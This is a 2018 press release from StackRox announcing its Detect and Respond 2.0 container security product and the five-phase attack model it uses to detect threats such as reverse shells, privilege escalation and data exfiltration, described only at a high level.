StackRox AIM Uses Five Phases of Attacks to Stop Threats in Enterprise Container Runtime Environments
MOUNTAIN VIEW, Calif. – January 31, 2018 – Today StackRox announced StackRox Detect and Respond 2.0, enhancing its robust threat detection capabilities across five phases of container attacks defined by the new StackRox AIM. With expanded depth and breadth of threat detection, auto-tuned machine learning, and application auto-grouping, StackRox Detection and Response 2.0 enables customers to get ahead of threats aimed at their Docker containers running in production with greater ease and efficiency.
“Container usage for production deployments in enterprises is still constrained by concerns around security, monitoring, data management, networking and orchestration,” wrote Arun Chandrasekaran and Dennis Smith, Gartner research VPs in Best Practices for Running Containers in Production.* StackRox Detect and Respond deploys using a customer’s existing tools and orchestrator, running alongside containerized applications to continuously monitor and protect containers from threats.
StackRox’s research and development with Docker, Google, and large enterprises in the area of container runtime security has culminated in StackRox AIM, a five-phase threat model that underlies our unique detection strategy to surfacing attacks. By examining application deployments through an attacker’s lens, StackRox exposes threats by fusing together signals in container environments which correspond to the five iterative phases of an attack’s lifecycle. The new detection capabilities within each of these categories include:
- Foothold. Reverse shell invocation enabled by generic initial exploitation vectors (i.e. web/network-based exploits); java-based code injection attacks.
- Privilege Escalation. Execution of setuid/setgid by non-root users.
- Persistence. Database persistence via post of database procedures; user persistence via modification of PAM configurations.
- Lateral Movement. Anomalous network communication with a client followed by payload execution or unexpected process cloning.
- Objectives. Cryptocurrency mining software; exfiltration of sensitive content via reading stored secrets or accessing confidential file paths.
“We’ve worked closely with our enterprise customers to help protect them against the new landscape of threats in container environments. Together we developed StackRox AIM as a new methodology to protect them from threats,” said Sameer Bhalotra, co-founder and CEO for StackRox. “With the new capabilities in StackRox Detect and Respond 2.0, enterprises running containers in production can get ahead of attackers and limit the blast radius of attacks.”
StackRox Detect and Respond 2.0 now includes:
- Expanded threat detection. New capabilities as described above to increase the depth and breadth of threat detection based on StackRox AIM.
- Autotuned machine learning. StackRox now automates learning from security events, establishing baselines so it can provide alerts for anomalous activities as potential Indicators of Compromise (IOCs).
- Extended integration with container orchestrators. StackRox leverages user-defined data from the orchestrator to automatically group services within applications, eliminating manual work for users, and providing immediate visibility into applications.
StackRox Detect and Respond 2.0 is scheduled for general availability in Q1.
- Deep dive into StackRox Detect and Respond 2.0
- StackRox AIM brief
- Sign up for our Webcast: Building an enterprise container security strategy with StackRox
- Learn more about StackRox
- Connect with StackRox at stackrox.com, Twitter, LinkedIn, and Facebook
*Gartner, Best Practices for Running Containers in Production, by Arun Chandrasekaran and Dennis Smith, 25 July 2017.
Founded in 2014, StackRox helps enterprises secure their cloud-native applications at scale. StackRox is the industry’s first detection and response platform that defends containers and microservices from new threats. StackRox enables security teams to visualize the container attack surface, expose malicious activity, and stop the attacker kill chain. It combines a new security architecture, machine learning, and protective actions to disrupt attacks in real time and limit their impact. StackRox is the choice of Global 2000 enterprises and backed by Sequoia Capital.